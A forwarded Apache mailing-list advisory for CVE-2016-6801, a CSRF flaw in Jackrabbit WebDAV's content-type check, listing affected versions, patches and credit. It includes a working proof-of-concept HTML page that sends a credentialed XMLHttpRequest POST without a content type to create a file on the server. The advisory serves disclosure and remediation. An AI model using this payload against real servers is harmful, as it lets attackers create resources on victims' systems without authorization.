Fwd: CVE-2016-6801: CSRF in Jackrabbit-Webdav using empty content-type

Thu, 15 Sep 2016 01:04:56 -0700 

(FYI - forgot this mailing list in my initial mail)


-------- Forwarded Message --------
Subject: CVE-2016-6801: CSRF in Jackrabbit-Webdav using empty content-type
Date: Wed, 14 Sep 2016 14:34:22 +0200
From: Julian Reschke <resc...@apache.org>
Reply-To: d...@jackrabbit.apache.org
To: Lukas Reschke <lu...@statuscode.ch>, Jackrabbit Users <us...@jackrabbit.apache.org>, d...@jackrabbit.apache.org <d...@jackrabbit.apache.org>, secur...@apache.org <secur...@apache.org>, oss-secur...@lists.openwall.com, bugt...@securityfocus.com 

CVE-2016-6801: CSRF in Jackrabbit-Webdav using empty content-type

Severity: Important

Vendor:
The Apache Software Foundation

Versions Affected:
Apache Jackrabbit 2.4.5
Apache Jackrabbit 2.6.5
Apache Jackrabbit 2.8.2
Apache Jackrabbit 2.10.3
Apache Jackrabbit 2.12.3
Apache Jackrabbit 2.13.2

Description:
The CSRF content-type check for POST requests does not handle missing Content-Type header fields, nor variations in field values with respect to upper/lower case or optional parameters. This can be exploited to create a resource via CSRF. 

Mitigation:
2.4.x users upgrade to 2.4.5 and apply the patch in http://svn.apache.org/r1758791 and/or upgrade to 2.4.6 once released 2.6.x users upgrade to 2.6.5 and apply the patch in http://svn.apache.org/r1758771 and/or upgrade to 2.6.6 once released 2.8.x users upgrade to 2.8.2 and apply the patch in http://svn.apache.org/r1758764 and/or upgrade to 2.8.3 once released 
2.10.x users should upgrade to 2.10.4
2.12.x users should upgrade to 2.12.4
2.13.x users should upgrade to 2.13.3

Example:
A resource can be created like so:
<html>
   <body>
     <script>
       function submitRequest()
       {
         var xhr = new XMLHttpRequest();
         xhr.open("POST", "http://localhost:42427/test/csrf.txt";, true);
         xhr.withCredentials = true;
         var body = "This file has been uploaded via CSRF.=\r\n";
         var aBody = new Uint8Array(body.length);
         for (var i = 0; i < aBody.length; i++)
           aBody[i] = body.charCodeAt(i);
         xhr.send(new Blob([aBody]));
       }
     </script>
     <form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" /> 
     </form>
   </body>
</html>

Credit:
This issue was discovered by Lukas Reschke.

Reply via email to